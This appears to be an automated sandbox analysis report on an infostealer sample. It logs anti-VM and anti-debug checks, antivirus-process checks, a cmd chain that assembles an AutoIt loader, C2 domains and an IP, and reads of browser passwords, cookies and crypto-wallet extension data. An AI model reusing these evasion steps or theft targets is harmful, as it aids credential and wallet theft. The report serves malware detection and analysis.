        Source: vUcZzNWkKc.exe, vUcZzNWkKc.exe, 00000000.00000003.1703263673.0000000005100000.00000004.00001000.00020000.00000000.sdmp, vUcZzNWkKc.exe, 00000000.00000002.1745528277.0000000000612000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DetectVirtualMachine
        Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
        Source: vUcZzNWkKc.exe, 00000000.00000003.1703263673.0000000005100000.00000004.00001000.00020000.00000000.sdmp, vUcZzNWkKc.exe, 00000000.00000002.1745528277.0000000000612000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
        Source: vUcZzNWkKc.exe, 00000000.00000002.1749214354.000000000125C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y &XCs
        Source: vUcZzNWkKc.exe, 00000000.00000002.1747886194.0000000000F26000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
        Source: Set-up.exe, 00000002.00000003.1745060264.00000000006D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeOpen window title or class name: regmonclass
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeOpen window title or class name: gbdyllo
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeOpen window title or class name: procmon_window_class
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeOpen window title or class name: ollydbg
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeOpen window title or class name: filemonclass
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile opened: NTICE
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile opened: SICE
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile opened: SIWVID
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406328
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
        Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: spuriotis.click
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" Jump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmdJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ReflectJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled VJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com VJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
        Source: Climb.com, 0000000D.00000000.1778355931.0000000000AE3000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000D.00000003.1924401119.000000000451E000.00000004.00000800.00020000.00000000.sdmp, Alt.10.dr, Climb.com.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: vUcZzNWkKc.exe, vUcZzNWkKc.exe, 00000000.00000002.1747886194.0000000000F26000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: IJProgram Manager
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,1_2_00406831
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: procmon.exe
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: wireshark.exe
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: global trafficTCP traffic: 192.168.2.4:49732 -> 194.87.58.92:80
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
